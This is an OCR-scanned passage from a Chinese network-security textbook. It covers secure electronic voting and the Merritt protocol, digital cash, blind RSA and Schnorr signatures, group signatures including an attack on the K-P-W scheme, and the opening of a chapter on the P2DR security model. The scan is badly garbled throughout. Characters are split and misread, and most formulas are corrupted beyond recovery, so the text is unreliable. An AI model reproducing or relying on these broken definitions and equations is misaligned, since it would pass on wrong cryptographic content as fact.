(7) 可 验证 性 : 即 投票 人 可 以 检验 自己 的 选票 被 正确 计 和 人 点 票 结果 。 
更 一 般 地 ,实现 电子 选举 应 用 还 要 考虑 多 方面 因素 ,如 图 9. 11 所 示 。 


电子 投票 
(E-voting) 


可 行 性 


1. 可 行 性 分 析 
2. 可 能 接受 的 


9.11 电子 选举 应 用 可 能 的 多 方面 因素 


9.2.2 安全 电子 选举 模型 

如 图 9. 12 所 示 ,该 模型 包含 了 目前 电子 选举 问题 涉及 所 有 重要 参数 及 其 关系 ,根据 实 
际 选举 环境 ,从 中 选择 适当 的 参数 ,可 以 进行 各 种 环境 下 的 安全 EVS 的 设计 。 任 意 选 举 问 
题 都 可 以 用 三 维 空间 中 的 一 点 来 表示 ,例如 : (2,3,2) 模 型 表示 基于 安全 信道 ,3 个 选举 机 
构 的 电子 选举 系统 ,其 选票 为 “m 选 1" 的 形式 。 在 模型 中 : 


1 上 1 1 i 
1 2 3 4 5 XY(Participant) 


private 
anonymous V R 4 7 Others 
Voting-booth 

X(Channel) V:Voter T:Tally R:Register A:Authority 


9.12 电子 选举 模型 


(1) 参与 方 (Participant) , 即 一 个 EVS 包括 选民 (Voter) 、 注 册 机 构 (Register) 、 认 证 机 
构 (Authority) 、 计 票 机 构 (Trend) 等 参与 方 的 集合 实体 ,任意 参与 方 均 抽象 为 概率 多 项 式 时 
间 的 图 灵机 ,其 主要 功能 如 表 9. 2 所 示 。 

(2) 选票 (vote) 。 将 选票 模型 化 为 各 种 多 项 选择 问题 ,分 别 用 "yes/no”“1 -out - of - 
m”、“k -out - of - m” 表 示 “ 两 选 一 ”“m 选 1]” 和 “m 选 &"(m 二 有 ) 等 形式 的 选举 。 


需 必 潞 


多 方 安全 碎 议 


秦 于 案例 的 网 络 安全 技术 与 实践 


表 9.2 选举 机 构 组 成 
符 ”号 名 称 功 能 
R{Ri,R;,… ,Ry}) 注册 机 构 掌握 合格 选民 vw 的 实际 身份 D; ,合法 选民 总 数 ,维护 合法 选民 列表 
A{Ai,A:，…,Aux) 认证 机 构 ”为 合法 选民 发 放空 白 选 票 Ballot; ,对 需要 高 度 安全 的 选举 ,利用 (t, n) 
门限 密码 体制 ,由 M 个 机 构 联合 签发 选票 
T{Ti,T,,… ,Ti) 计 票 机 构 接收 并 处 理 选票 voted; ,联合 统计 选票 并 公开 最 后 结果 


“两 选 一 ”选票 形式 为 *yes/no”, 从 两 个 候选 者 中 选 出 一 个 获胜 者 。“ 多 选 一 ” 指 每 张 选 
票 中 只 能 选 一 名 候选 人 ,得 票 最 高 者 获胜 。“ 多 选 多 ” 指 一 张 选票 中 有 多 名 候选 人 ,允许 同时 
选择 不 止 一 名 ,选举 结果 有 多 名 获胜 者 。 

(3) 通信 信道 模型 (Channel) 。 将 选举 系统 的 通信 信道 模型 定义 为 公开 信道 、 秘 密 信 
道 、 无 泄露 信道 .匿名 信道 、 投 票 站 /投票 亭 等 类 型 , 表 9. 3 列 出 各 种 信道 特征 的 定义 。 


表 9.3 通信 信道 模型 
信 道 证 这 


公开 信道 实际 的 通信 信道 ,不 安全 ,无 法 校 验 发 送 者 或 者 接收 者 的 标识 
秘密 信道 /无 泄漏 信道 ” 安全 通信 信道 ,接收 方 确切 知道 发 送 方 的 身份 ,发 出 的 消息 都 能 不 被 修改 的 接 
收 到 ,任何 第 三 方 都 不 会 知道 这 个 消息 


匿名 信道 发 送 者 的 身份 是 不 可 追踪 (untraceable) 
投票 站 /投票 亭 假设 攻击 者 和 选民 分 别 在 不 同 的 物理 信道 中 ,任何 人 都 不 能 看 到 选民 在 投票 
站 中 的 行为 和 输入 的 信息 


9.2.3 安全 电子 选举 结构 


电子 选举 过 程 分 为 4 个 阶段 : 系统 初始 化 阶段 .选票 发 放 阶 段 .注册 阶段 和 投票 阶段 ， 
结构 图 如 图 9. 13 所 示 ,一 个 实际 的 选举 过 程 如 图 9. 14 所 示 。 


选票 发 放 中 心 2 计 票 中 心 
CR2 DO 


1. 选 a 2- | 2- i 3-1 投 票 阶 “3-2 投票 阶段 : 
获取 投票 编号 及 ”发 送 注册 信息 验证 身份 ， 对 盲 段 : 匿名 投 对 合法 选票 签 
其 签名 和 言 化 的 选票 化 选票 签名 出 选票 名 ， 并 公开 投 
票 结果 


| Xi 和 | 


图 9. 13 电子 选举 方案 结构 图 


直接 :亲自 直接 圈 选 平等 :人 人 一 票 ， 票 票 等 值 
普通 :身份 符合 者 皆 可 选举 


全 
已 选举 注册 和 =-- 


不 记名 : 无 法 从 合法 选票 
判别 选举 人 身份 
(选票 与 认证 的 确认 方式 ) 


投票 站 
争执 仲裁 


9.14 一 个 实际 的 选举 过 程 


9.2.4 安全 电子 选举 优 缺 点 与 实例 
电子 选举 的 优 缺 点 总 结 如 表 9. 4 所 示 。 


表 9.4 电子 选举 优 缺 点 


个 人 投票 电子 投票 
(1) 区 . 时 的 问题 行 
(1) 符合 直接 ,平等 .不 记名 .秘密 等 | (1) 改善 人 工 计 票 费时 的 问题 ,增加 行政 歼 率 
选举 原则 (2) 降低 废 票 率 
优点 (3) 减少 人 工 可 能 引发 的 服务 惠 间 


(2) 实体 选票 提高 选民 信心 


(3) 现 有 法 制 配合 投票 制度 (4) 降低 传统 选票 的 印刷 与 保留 成 本 


(5) 计 票 快速 准确 


(1) 纸张 人力 资 源 浪费 (1) 公民 接受 度 不 足 
(2) 有 效 票 与 无 效 票 的 认定 容易 产生 | (2) 电子 投票 法 制 未 健全 
争执 (3) 选举 机 器 存放 空间 问题 
缺点 (3) 选票 保存 困难 (4) 选 务 人 员 的 训练 成 本 
(4) 人 工 开票 . 计 票 旷 日 费 时 (5) 投票 机 器 有 当 机 、 读 取 错误 的 可 能 ,造成 投票 秩 
(5) 出 现 争议 时 ,重新 验 票 手续 繁杂 序 混乱 
(6) 投票 流程 复杂 (6) 容易 受制 于 软件 厂商 


实例 : Merrit 选举 协议 ,如 图 9.15 所 示 。 


多 方 安 会 座 议 


贡 < 站 


基于 案例 的 网 络 安 会 鞭 术 与 实践 


假定 个 用 户 Ui ,U: ,…,U, 正在 对 某 个 问题 投票 。 假 设 每 个 投票 者 都 有 一 个 公开 密 钥 和 私 
人 密 钥 。 并 且 假 设 每 个 人 都 知道 其 他 人 的 公开 密 钥 。 每 个 投票 者 选择 一 张 选票 并 做 以 下 
事情 : 

(1) 选择 随机 数 R, ,计算 X= E,(E,(E,(*…E,(V,R,)…)))。 

(2) 选择 随机 数 Ri ,R: ,…,R, ,计算 Y = E,(R,,E,(R,-1,(…(E,(Ri ,XX)…))))。 所 有 的 投 
票 者 将 会 记 下 计算 中 每 一 点 的 中 间 结 果 , 后 面 将 会 用 这 些 结果 来 确定 他 们 的 选票 是 否 被 
计数 。 

(3) 每 个 人 把 他 的 加 密 的 选票 了 给 U ,U, 将 Y 解密 ,并 去 掉 随机 数 R, ,结果 为 Es (R,_;,(… 
(E, (Ri ,X)…))) ,并 将 选票 置 乱 ,U, 将 选票 给 U: 。 

(4) Us 将 U 的 结果 解密 ,检查 U: 的 选票 是 否 在 选票 集中 ,并 去 掉 随机 数 R,- ,结果 为 Es 
(R,-:，("…(E, (Ri ,XX)…))) ,并 将 选票 置 乱 ,U; 将 选票 给 U; 。 

(5) 如 此 进行 下 去 ,直到 U, 解密 U,-: 的 结果 ,检查 U, 的 选票 是 否 在 选票 集中 ,并 去 掉 随机 
数 Ri ,结果 为 XX, 并 将 选票 置 乱 ,U, 将 选票 给 U, 。 

(6) U 将 选票 解密 ,检查 他 的 选票 是 否 在 选票 集中 ,签名 所 有 选票 ,并 将 结果 送 给 Us ,U;， 
…,U, ,现在 选票 的 形式 是 S, (E:(E,(…(E,CV,R,)…)))。 

(7) UU, 验证 并 删除 U, 的 签名 ,用 自己 的 私人 密 钥 对 所 有 选票 解密 ,察看 U, 的 选票 是 否 在 选 
票 集中 ,对 所 有 选票 签名 ,并 送 给 U, ,Us ,…',U, ,现在 选票 的 形式 是 S: (E, (E,(…(E, 
CV,R,)…))) 。 

(8) 如 此 进行 下 去 ,直到 U, 验证 并 删除 U, -, 的 签名 ,用 自己 的 私人 密 钥 对 所 有 选票 解密 , 察 
看 U, 的 选票 是 否 在 选票 集中 ,对 所 有 选票 签名 ,并 送 给 U, ,U,,…,U,-, ,现在 选票 的 形 
式 是 S,(V,R,) 。 

(9) 所 有 人 验证 并 删除 U, 的 签名 ,检验 他 们 的 选票 是 否 在 选票 集中 。 

(10) 每 人 从 自己 的 选票 中 删除 R, ,并 记录 每 一 张 选票 。 


图 9.15 Merrit 选举 协议 


9.3 美丽 的 交易 : 电子 商务 的 安全 


电子 商务 的 安全 俗称 "电子 现金 ?或 “数字 现金 ", 是 经 银行 数字 签名 的 表示 现金 的 加 密 
序列 数 , 它 是 以 David Chaum 所 研究 发 展 的 盲目 签名 技术 为 基础 的 一 种 数字 化 货币 , 它 适 
合 于 在 因特网 上 进行 小 额 实时 支付 ,是 电子 商务 的 基础 。 

从 数字 现金 体制 中 的 特征 至 少 包括 : 伪造 困难 ; 副本 应 该 是 既 可 防止 又 可 探测 的 ; 保 
持 消费 者 的 匿名 ; 在 大 数据 库 中 保持 极 小 在 线 操作 。 


9.3.1 解构 商业 : 现实 场景 分 析 


一 个 数字 现金 体制 通常 由 3 个 协议 组 成 : 撤回 协议 允许 使 用 者 从 银行 获得 数字 货币 ; 
支付 协议 是 使 用 者 通过 数字 交换 购买 货物 ; 存款 协议 是 买主 账户 上 现金 返回 银行 的 协议 。 
实例 : 假设 银行 有 秘密 密 钥 SKs 签署 消息 ,并 且 任何 人 都 知道 其 相应 的 公共 密 钥 PKs。 使 
用 符号 {M})sx 表示 消息 M 在 SK 下 的 签名 。 现 实 场景 的 数字 现金 协议 的 一 般 情 况 如 
图 9. 16 所 示 。 


撤回 协议 : 

(1) 用 户 告知 银行 希望 撤回 $ 100。 

(2) 银行 返回 一 个 $100 的 账单 ,如 同 : {I am a $100 bill ，# 4527)} SKs, 从 用 户 账户 抽 
走 $100。 

(3) 用 户 检查 签名 并 且 根 据 接收 到 的 账单 验证 结果 的 正确 性 。 

支付 协议 : 

(1) 用 户 付 给 买主 账单 。 

(2) 买主 检查 签名 ,如 果 是 有 效 的 ,接收 账单 。 

存款 协议 ， 

(1) 买主 把 账单 提供 给 银行 。 

(2) 买主 检查 签名 是 否 有 效 , 相 信 买 主 账户 。 

分 析 : 车 假设 签名 体制 是 安全 的 ,可 以 看 出 伪造 数字 货币 是 不 可 行 的 。 但 是 存在 以 下 缺点 : 

一 是 数字 货币 可 以 复制 问题 ,要 保证 其 限时 性 和 区 分 性 ; 二 是 数字 货币 账单 匿名 性 的 问题 ， 

可 以 导致 用 户 信 息 泄露 ,存在 安全 隐患 。 


9.16 ”现实 场景 的 数字 现金 协议 的 一 般 情况 


9.3.2 核心 技术 之 一 : 讶 签名 


1982 年 Chaum 首先 提出 了 盲 签名 (Blind Signature) 的 概念 ,简单 地 说 , 盲 签名 是 一 种 
特殊 类 型 的 数字 签名 , 它 是 一 个 双方 协议 。 一 般 数字 签名 协议 的 本 质 特 征 是 签名 者 知道 所 
签署 的 消息 内 容 , 而 在 盲 签名 协议 中 , 先 由 接收 者 对 原始 信息 进行 讶 化 ,然后 发 送 给 签名 者 ; 
签名 者 对 盲 化 后 的 信息 进行 签名 并 返还 给 接收 者 ; 接收 者 去 盲 化 ,最 终 得 到 签名 者 关于 原 
始 信息 的 正确 签名 。 

D. Chausn 曾 给 出 了 关于 盲 签名 更 直观 的 说 明 。 所 谓 盲 签名 ,就 是 先 将 要 隐藏 的 文件 
放 进 信封 里 ,而 除 掉 盲 因子 的 过 程 就 是 打开 这 个 信封 。 当 文件 装 在 一 个 信封 中 时 ,任何 人 都 
不 能 读 它 , 签 这 个 文件 就 是 在 信封 里 放 一 张 复 写 纸 , 当 签名 者 签 这 个 信封 时 ,他 的 签名 便 透 
过 复写 纸 签到 了 文件 上 。 

一 般 来 说 ,一 个 好 的 盲 签名 应 该 具有 以 下 的 性 质 : 

(1) 不 可 伪造 性 。 除 了 签名 者 本 人 外 ,任何 人 都 不 能 以 他 的 名 义 生成 有 效 的 盲 签名 。 
这 是 一 条 最 基本 的 性 质 。 

(2) 不 可 抵赖 性 。 签 名 者 一 旦 签署 了 某 个 消息 ,他 无 法 否认 自己 对 消息 的 签名 。 

(3) 讶 性。 签名 者 虽然 对 某 个 消息 进行 了 签名 ,但 他 不 可 能 得 到 消息 的 具体 内 容 。 

(4) 不 可 跟踪 性 。 一 旦 消息 的 签名 公开 ,签名 者 不 能 确定 自己 何 时 签署 的 这 条 消息 。 

下 面 介绍 两 种 盲 签 名 方案 。 

(1) 盲 RSA 签名 方案 。 

Alice 为 了 从 Bob 处 获得 关于 消息 m 的 签名 ,使 用 随机 数 > 和 Bob 的 公 钥 (e,n) ,构造 
盲 消息 到 一 mmod n。Bob 收 到 太后 便 可 利用 自己 的 密 钥 & 产生 签名 > 一 7 mod n。Alice 
通过 计算 sr !' 二 (mr')*r 一 7 一 s 便 可 获得 Bob 关于 消息 m 的 签名 。 可 以 看 出 ,由 于 讶 
因子 7 的 作用 ,Bob 从 芭 看 不 到 真实 消息 m. 但 Alice 却 可 利用 -~ 获得 sig(m) 二 s。 

(2) 盲 Schnorr 签名 方案 如 图 9. 17 所 示 。 

那么 盲 签 名 就 是 sig(m) 一 (s" ,e" )。 容 易 验 证 (e,r,s ) 和 (e* ,r,s* ) 满 足 同一 验证 方 
程 , 即 有 r==giy“mod p 和 +r* 一 g* y mod p。 
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Alice( 盲 签名 者 ) Bob( 消 息 拥有 者 ) 
(1) 选择 随机 数 kE 肥 ,， (2) 选择 随机 数 d,ue 2z,， 计 算 
计算 r=g* mod p， 将 /发 给 Bob 。 r=g Yr mod p, €=h(r' sm), 


G3) 计算 s=ktex mod gq， 将 s 给 Bob e=e'+d mod g， 将 e 发 给 Alice 。 


(4) 计算 s*=s+tu mod g。 


9.17 盲 Schnorr 签名 方案 


9.3.3 核心 技术 之 二 : 群 签名 


在 EUROCRYPT’91 年 会 上 D. Chaum 和 E. vanHeyst 提出 了 一 个 新 类 型 的 签名 体 
制 一 一 群 签名 。 这 种 体制 允许 群 成 员 之 一 代表 这 个 群体 对 消息 签名 ,任何 知道 群 公 钥 的 人 
可 以 验证 签名 的 正确 性 ,没有 人 可 以 知道 是 群 中 哪 一 位 签 的 名 。 但 有 一 个 可 信任 的 第 三 
方 一 一 称 为 群 管理 员 , 他 在 签名 出 现 争议 时 可 以 确定 签名 者 的 身份 。 

群 签名 在 电子 商务 .电子 政务 ,甚至 军事 通信 中 都 具有 举足轻重 的 地 位 。 比 如 在 公共 资 
源 的 管理 .重要 军事 命令 的 签发 .重要 领导 人 的 选举 .电子 商务 .重要 新 闻 的 发 布 和 金融 合同 
的 签署 等 事物 中 , 群 签名 都 可 以 发 挥 重 要 作用 。 和 群 签名 的 过 程 、 性 质 和 具有 可 信和 仲裁 者 的 群 
体 签名 实例 如 图 9. 18 .图 9. 19 和 图 9. 20 所 示 。 


群 签名 的 过 程 : 

建立 : 一 个 指定 群 管理 员 和 群 成 员 之 间 概 率 交互 协议 。 它 的 结果 包括 群 公 钥 y, 群 成 员 的 秘 
密 密 钥 x 和 给 群 管理 员 的 秘密 管理 密 钥 。 

签名 : 一 个 概率 算法 ,其 输入 为 一 个 消息 和 群 成 员 的 秘密 密 钥 xz, 其 结果 为 一 个 对 消息 的 
签名 。 

验证 : 一 个 算法 ,其 输入 为 消息 、 消 息 签名 和 群 公 钥 y, 其 结果 为 签名 是 否 正确 。 

打开 : 一 个 算法 ,其 输入 为 签名 和 群 管理 员 的 秘密 管理 密 钥 ,其 结果 为 发 出 签名 的 群 成 员 的 
身份 和 事实 证 明 。 


9.18 和 群 签 名 的 过 程 


假定 群 成 员 和 和 群 管理 员 之 间 的 所 有 交流 都 是 秘密 进行 的 ,一 个 群 签 名 体制 必须 满足 下 列 
性 质 。 

不 可 伪造 性 : 只 有 群 成 员 能 产生 正确 的 消息 签名 。 

匿名 性 : 要 确定 哪 一 个 群 成 员 对 消息 进行 了 签名 是 不 可 能 的 。 

不 可 连接 性 : 要 确定 两 个 签名 是 否 是 由 同一 个 群 成 员 签署 的 是 不 可 能 的 。 

陷害 攻击 安全 性 : 群 成 员 不 能 打开 签名 ,同时 也 不 能 代表 其 他 成 员 签名 ,进一步 群 管理 员 也 
是 如 此 。 这 个 性 质 表 明 群 管理 员 一 定 不 能 知道 群 成 员 的 秘密 密 钥 。 

对 于 群 签名 体制 的 有 效 性 由 如 下 几 个 因素 决定 : 群 公 钥 y 的 大 小 ; 签名 的 长 度 ; 签名 和 验证 
算法 的 有 效 性 ; 加 入 和 打开 协议 的 有 效 性 。 


图 9.19 和 群 签名 的 性 质 


有 具有 可 信 仲 裁 者 的 群体 签名 : 

(1) Trent 生成 一 大 批 公开 密 钥 / 私 钥 密 钥 对 ,并 且 给 团体 内 每 个 成 员 一 个 不 同 的 唯一 私 钥 
表 。 在 任何 表 中 密 钥 都 是 不 同 的 (如 果 团 体内 有 个 成 员 , 每 个 成 员 得 到 m 个 密 钥 对 , 那 
么 总 共有 nXm 个 密 钥 对 )。 

(2) Trent 以 随机 顺序 公开 该 团体 所 用 的 公开 密 钥 主 表 。Trent 保持 一 个 哪些 密 钥 属于 谁 的 
秘密 记录 。 

(3) 当 团 体内 成 员 想 对 一 个 文件 签名 时 ,他 从 自己 的 密 钥 表 中 随机 选取 一 个 密 钥 。 

(4) 当 有 人 想 验证 签名 是 否 属于 该 团体 时 ,只 需 查找 对 应 公开 钥 主 表 并 验证 签名 。 

(5) 当 争 议 发 生 时 ,Trent 知道 哪个 公 钥 对 应 于 哪个 成 员 。 

这 个 协议 的 问题 在 于 需要 可 信 的 一 方 。Trent 知道 每 个 人 的 私 钥 因 而 能 够 伪造 签名 。 而 且 ， 
m 必须 足够 长 ,以 避免 试图 分 析出 每 个 成 员 用 的 哪些 密 钥 。 


9.20 具有 可 信 仲 裁 者 的 群体 签名 


在 Chaum 和 Van Heyst 的 开创 性 论文 里 提出 了 4 种 签名 体制 ,但 它们 都 具有 如 下 的 缺 
点 : 

(1) 当 群 体 改 变 时 ,每 个 成 员 需 要 重新 分 配 密 钥 。 

(2) 权威 不 能 辨别 出 签名 者 。 为 了 解决 这 个 问题 ,下 面 给 出 一 种 称 作 K-P-W 可 变 群 签 
名 方案 (Convertible Group Signature) 如 图 9. 21 所 示 。 


系统 参数 : 选择 n= 二 pg 二 (2fp' 十 1)(2fgq' 十 1) ,这 里 的 p,qg，f，p' 和 gq 为 相 异 的 大 素数 ,g 的 
阶 为 f。Y 和 4d 为 整数 , 且 Yd 二 1 mod $(n) ,gcd(7Y,$(n)) 二 1,h 为 安全 的 Hash 函 
数 ,IDs 为 GC 的 身份 消息 。 
签名 组 的 公 钥 : (n,7,g,f,h,IDs)。 
签名 组 的 私 钥 : (d,p' ,gq')。 
设 ID 为 组 成 员 A 的 身份 消息 ,A 随机 选取 SsE (0,/) ,并 将 消息 (IDa,g* mod nn) 发 送 给 
GC。GC 计 算 zs 一 (IDc)-” mod n, 并 将 za 秘密 地 传送 给 成 员 A, 则 A 的 私有 密 钥 : (xa， 
SA) 。 
签名 算法 : 对 于 待 签 消息 m: 组 中 成 员 A 随机 选择 整数 (~m ,r) EL0,7) ,计算 : 
V=g" ri mod n,e=h(V,m) 
则 群 签名 为 (e ,zi ,z;)。 
其 中 
x = 二 sae(mod f), zx; = rxh (mod n) 
签名 验证 算法 : e 一 A(V,zz) ,这 里 的 V=(IDe) 人 gz! (mod n)。 
身份 验证 算法 : g* = 二 (Vra”)(g*)“(mod n) ,其 中 ;二 zszxA“(mod n)。 


9.21 K-P-W 可 变 群 签名 方案 


K-P-W 可 变 群 签名 方案 的 安全 性 分 析 : 

(1) 当 p' 和 g 具有 相同 的 比特 位 时 ,攻击 者 可 以 采用 对 参数 ”进行 因子 分 解 的 方法 。 
分 解 n 二 pg 一 (2fp' 十 1) (2fq 十 只 需要 24?* ”次 整数 乘法 ,这 里 |z| 为 zx 的 比特 位 数 。 

(2) 在 组 中 成 员 诚 实 的 情况 下 ,虽说 权威 能 辨别 出 签名 者 ,可 是 当 组 中 的 成 员 伪 造 或 共 
谋 伪 造 时 , 仍 能 生成 有 效 的 签名 。 设 组 中 成 员 A 随机 选取 整数 a 和 0, 计算 ss 一 ap mod f 


凯 必 潞 
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和 s4 二 s4 十 b mod 了 ,将 s4 和 s% 分 别 作 为 A 的 两 个 私 钥 , 公 钥 为 ya 一 g* mod my 一 5 
mod n, 从 GC 处 秘密 地 收 到 相应 的 另外 两 个 私 钥 za 和 zx 和, 则 有 g*==xa (zh) 1 mod nn， 
TDz? 王 za(g2%2) mod n, 于 是 可 以 得 到 g*=(g” )* ”mod n。 对 于 任意 的 s4, 由 于 A 知道 
IDa” 和 gr, 故 可 算出 私 钥 (zxa ,sa)。 然 后 利用 K-P-W 签名 方案 ,对 任意 的 消息 ,都 可 以 产 
生 有 效 的 群 签名 ,而 权威 无 法 辨认 签名 用 户 。 如 果 组 中 两 成 员 共 谋 ,利用 上 述 方法 同样 可 产 
生 有 效 的 群 签名 ,而 权威 无 法 辨认 签名 用 户 。 


9.4 小 结 


多 方 安全 协议 的 核心 是 安全 多 方 计算 问题 ,多 方 计算 问题 的 本 质 可 以 看 成 是 一 组 参与 
者 希望 共同 计算 某 个 约定 的 函数 ,此 函数 输入 参数 有 多 个 , 且 每 个 参与 者 提供 函数 的 一 个 输 
入 。 若 引入 安全 因素 , 则 安全 多 方 计算 问题 可 以 在 多 方 计算 问题 的 基础 上 描述 为 : 其 中 每 
个 人 都 知道 这 个 函数 的 值 , 且 除了 函数 的 输出 外 ,没有 人 知道 关于 任何 其 他 成 员 输入 的 任何 
事情 。 

本 童 将 多 方 安全 协议 分 解 为 3 个 分 支 进行 描述 : 基本 多 方 安全 协议 .电子 选举 协议 和 
电子 商务 协议 。 其 中 基本 多 方 安全 协议 偏重 理论 基础 及 基本 算法 ,而 电子 选举 协议 和 电子 
商务 协议 则 以 应 用 角度 切入 、 转 向 理论 寻找 方法 的 自 顶 向 下 思维 方式 进行 描述 ,最 终 使 本 章 
形成 理论 与 应 用 相 结 合 的 统一 整体 。 


9.5 习 题 
1. 说 明 秘 密 共 享 的 应 用 实例 。 
2. 秘密 共享 中 的 欺骗 问题 都 有 哪些 ? 如何 防止 ? 
3. 说 明 盲 Schnorr 签名 方案 。 
4. 简要 说 明 群 签名 的 一 般 过 程 。 


第 10 章 网 络 安全 体系 结构 


安全 是 一 个 过 程 ,而 不 是 一 个 产品 。 
如 果 你 认为 技术 能 够 解决 安全 问题 ,那么 你 就 不 理解 安全 问题 也 不 理解 技术 。 


一 Bruce Schneier 


计算 机 系统 的 安全 一 直 是 动态 的 。 攻 击 和 反攻 击 威胁 与 反 威胁 是 一 对 永恒 的 矛盾 。 
安全 是 相对 的 ,是 有 一 定时 限 的 ,不 可 能 有 一 劳 永 逸 的 安全 防护 措施 。 因 此 ,处 于 安全 策略 
基础 之 上 的 安全 模型 除了 加 强 防护 ,还 要 不 断 进行 检测 ,以 备 及 时 恢复 。 

ISO 颁布 的 ISO 7489-2 标准 是 普遍 适用 的 信息 安全 体系 结构 ,目的 是 保证 开放 系统 进 
程 之 间 远 距离 安全 交换 信息 。 这 个 标准 确立 了 与 安全 体系 结构 有 关 的 一 般 要 素 , 适 用 于 开 
放 系统 之 间 需 要 通信 保护 的 各 种 场合 。 

安全 策略 的 制定 与 正确 实施 对 组 织 的 安全 有 着 非常 重要 的 作用 。 


10.1 安全 模型 


任何 一 个 计算 机 网 络 系统 都 具有 潜在 的 危险 ,没有 绝对 的 安全 ,只 有 相对 的 安全 。 在 一 
个 特定 的 时 期 内 ,在 一 定 的 安全 策略 下 ,系统 可 能 是 安全 的 。 但 是 , 随 着 时 间 的 推移 ,攻击 技 
术 的 进步 ,系统 可 能 会 变 得 不 安全 了 。 因 此 ,安全 具有 动态 性 ,需要 适应 变化 的 环境 并 能 做 
出 相应 的 调整 以 确保 计算 机 网 络 系统 的 安全 。 

为 达到 预期 安全 目标 而 制定 的 一 套 安全 服务 准则 称 为 安全 策略 ,安全 模型 是 基于 安全 
策略 建立 起 来 的 。 安 全 模型 的 发 展 经 历 了 从 被 动 防御 到 主动 防御 的 过 程 ,强调 防御 和 恢复 。 


10.1.1 P2DR 模型 


20 世纪 90 年 代 末 ,美国 国际 互联 网 安全 系统 公司 防护 (P) 
(JInternet Security Systems Inc. ,ISS) 提 出 一 个 自 适应 网 络 安 
全 模型 , 称 为 PZDR 模型 ,如 图 10. 1 所 示 。P2DR 是 Policy 
(策略 )、Protection (防护 )、 Detection (检测 ) 和 Response( 响 响应 (R) 检测 (D) 
应 ) 的 缩写 。 

P2DR 模型 是 在 整体 的 策略 的 控制 和 指导 下 ,在 运用 防 
护 工 具 保 证 系统 运行 的 同时 ,利用 检测 工具 评估 系统 的 安全 
状态 ,通过 响应 工具 将 系统 调整 到 相对 安全 和 风险 最 低 的 状 


图 10.1 P2DR 模型 


基于 案例 的 网 络 安 会 技术 与 实践 


态 。 防 护 、 检 测 和 响应 组 成 了 一 个 完整 的 动态 的 安全 循环 ,在 安全 策略 的 指导 下 保证 系统 
的 安全 。 

在 P2DR 安全 模型 中 ,系统 的 安全 实际 上 是 理想 中 的 安全 策略 和 实际 的 执行 之 间 的 一 
个 平衡 ,强调 在 防护 、 监 控 检 测 、 响 应 等 环节 的 循环 过 程 ,通过 这 种 循环 达到 保持 安全 水 平 的 
目的 。 所 以 ,P2DR 安全 模型 是 整体 的 、 动 态 的 安全 模型 ,应 该 依据 不 同等 级 的 系统 安全 要 
求 来 完善 系统 的 安全 功能 、 安 全 机 制 。 

1. 策略 

策略 是 PZDR 模型 的 核心 ,描述 了 在 网 络 安全 管理 过 程 中 必须 遵守 的 原则 ,所 有 的 防 
护 、 检 测 和 响应 都 是 依据 安全 策略 进行 实施 的 。 不 同 的 网 络 可 以 有 不 同 的 策略 ,制定 策略 时 
需要 综合 考虑 整个 网 络 的 安全 需求 ,策略 一 旦 制定 完毕 ,就 应 该 成 为 整个 网 络 安全 行为 的 
准则 。 

当 设 计 所 涉及 的 那个 系统 在 进行 操作 时 ,必须 明确 在 安全 领域 的 范围 内 ,什么 操作 是 明 
确 允 许 的 ,什么 操作 是 默认 人 允许 的 ,什么 操作 是 明确 不 允许 的 ,什么 操作 是 默认 不 允许 的 。 
安全 策略 一 般 不 做 出 具体 的 措施 规定 ,也 不 确切 说 明 通 过 何 种 方式 才能 够 达到 预期 的 结果 ， 
但 是 应 该 向 系统 安全 实施 者 们 指出 在 当前 的 前 提 下 ,什么 因素 和 风险 才 是 最 重要 的 。 就 这 
个 意义 而 言 ,建立 安全 策略 是 实现 安全 的 最 首要 的 工作 ,也 是 实现 安全 技术 管理 与 规范 的 第 
一 步 。 安 全 策略 的 制定 实际 上 是 一 个 按照 安全 需求 ,依照 应 用 实例 不 断 精 确 细 化 的 求解 
过 程 。 

2. 防护 

防护 就 是 采用 一 切 手段 保护 计算 机 网 络 系统 的 保密 性 、 完 整 性 、 可 用 性 、 可 控 性 和 不 可 
否认 性 ,预先 阻止 攻击 可 以 发 生 的 条 件 产 生 , 让 攻击 者 无 法 顺利 地 入 侵 。 防 护 是 网 络 安 全 的 
第 一 道 防线 ,采用 静态 的 安全 技术 和 方法 来 实现 ,如 防火 墙 .操作 系统 身份 认证 ,加 密 等 ,这 
种 防护 称 为 被 动 防御 ,用 于 保护 网 络 信息 的 保密 性 .完整 性 和 可 用 性 。 

防护 可 以 分 为 3 大 类 : 系统 安全 防护 、 网 络 安全 防护 和 信息 安全 防护 。 

(1) 系统 安全 防护 : 操作 系统 的 安全 防护 , 即 各 个 操作 系统 的 安全 配置 .使 用 和 打 补 丁 
等 。 不 同 操作 系统 有 不 同 的 防护 措施 和 相应 的 安全 工具 。 

(2) 网 络 安全 防护 : 网 络 管理 的 安全 以 及 网 络 传 输 的 安全 。 

(3) 信息 安全 防护 : 数据 本 身 的 保密 性 、 完 整 性 和 可 用 性 。 数 据 加 密 就 是 信息 安全 防 
护 的 重要 技术 。 

防护 称 为 被 动 防御 ,可 以 阻止 大 多 数 入 侵 事 件 的 发 生 ,但 不 可 能 发 现 和 查找 到 安全 漏洞 
或 系统 异常 情况 并 加 以 阻止 。 

3. 检测 

检测 是 网 络 安全 的 第 二 道 防线 ,是 动态 响应 和 加 强 防护 的 依据 。 通 过 检测 工具 如 漏洞 
评估 、 和 侵 检测 等 ,不 断 检测 和 监控 网 络 的 状态 ,发 现 新 的 威胁 网 络 安全 的 异常 行为 ,然后 通 
过 反馈 并 及 时 做 出 有 效 的 响应 。 

检测 的 对 象 主要 针对 系统 自身 的 脆弱 性 和 外 部 威胁 。 主 要 包括 : 检查 系统 本 身 存 在 的 
脆弱 性 ; 检查 测试 信息 是 否 发 生 泄漏 、 系 统 是 否 遭 到 入 侵 , 并 找 出 泄漏 的 原因 和 攻击 的 来 
源 。 如 计算 机 网 络 人 侵 检测 .信息 传输 检查 .电子 邮件 监视 .电磁 泄漏 辐射 检测 .屏蔽 效果 测 
试 、 磁 介质 消 磁 效果 验证 等 。 


检测 和 防护 既 有 区 别 又 有 联系 。 防 护 主要 修补 系统 和 网 络 的 缺陷 ,增加 系统 的 安全 性 
能 ,从 而 消除 攻击 和 入 侵 的 条 件 。 检 测 并 不 是 根据 网 络 和 系统 的 缺陷 ,而 是 根据 入 侵 事件 的 
特征 去 检测 的 。 但 是 ,防护 和 检测 之 间 有 互补 关系 。 如 果 防 护 部 分 做 得 很 好 , 绝 大 多 数 攻击 
事件 都 被 阻止 ,那么 检测 部 分 的 任务 就 很 少 了 。 

4. 响应 

